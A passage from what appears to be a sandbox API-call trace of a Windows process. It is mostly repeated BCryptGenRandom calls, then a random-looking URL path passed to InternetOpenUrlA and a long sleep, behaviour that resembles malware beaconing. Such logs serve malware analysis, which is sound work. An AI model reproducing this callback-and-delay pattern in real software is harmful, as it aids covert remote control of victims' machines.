(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d52ef, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x4d52ef) returned 0x0 [0177.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5318, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4d5318) returned 0x0 [0177.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d532f, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x4d532f) returned 0x0 [0177.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.193] GetProcessHeap () returned 0x440000 [0177.193] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0177.193] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0177.193] lstrcatA (in: lpString1="\x04", lpString2="/htntS02eMEMnNEc98y4l64q596uVghfn42y1vk0xzrgj9/8zyfuektfjpwEr2902bj9qvZ2490hpoczvjocukh/vb1zlzPb3njd2bSnuspo19/o8xwhcd3aAotSj5kmd6vg9qIQZjp/" | out: lpString1="\x04/htntS02eMEMnNEc98y4l64q596uVghfn42y1vk0xzrgj9/8zyfuektfjpwEr2902bj9qvZ2490hpoczvjocukh/vb1zlzPb3njd2bSnuspo19/o8xwhcd3aAotSj5kmd6vg9qIQZjp/") returned="\x04/htntS02eMEMnNEc98y4l64q596uVghfn42y1vk0xzrgj9/8zyfuektfjpwEr2902bj9qvZ2490hpoczvjocukh/vb1zlzPb3njd2bSnuspo19/o8xwhcd3aAotSj5kmd6vg9qIQZjp/" [0177.193] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0177.193] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/htntS02eMEMnNEc98y4l64q596uVghfn42y1vk0xzrgj9/8zyfuektfjpwEr2902bj9qvZ2490hpoczvjocukh/vb1zlzPb3njd2bSnuspo19/o8xwhcd3aAotSj5kmd6vg9qIQZjp/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0177.193] GetProcessHeap () returned 0x440000 [0177.193] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0177.193] GetProcessHeap () returned 0x440000 [0177.193] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d52c0 | out: hHeap=0x440000) returned 1 [0177.193] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0177.193] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0177.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0177.194] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0177.194] Sleep (dwMilliseconds=0x1c587) [0177.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0177.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.350] GetProcessHeap () returned 0x440000 [0177.350] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a03450 [0177.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03451, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a03451) returned 0x0 [0177.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.350] BCryptGenRandom (in: hAlgorithm=0x0, 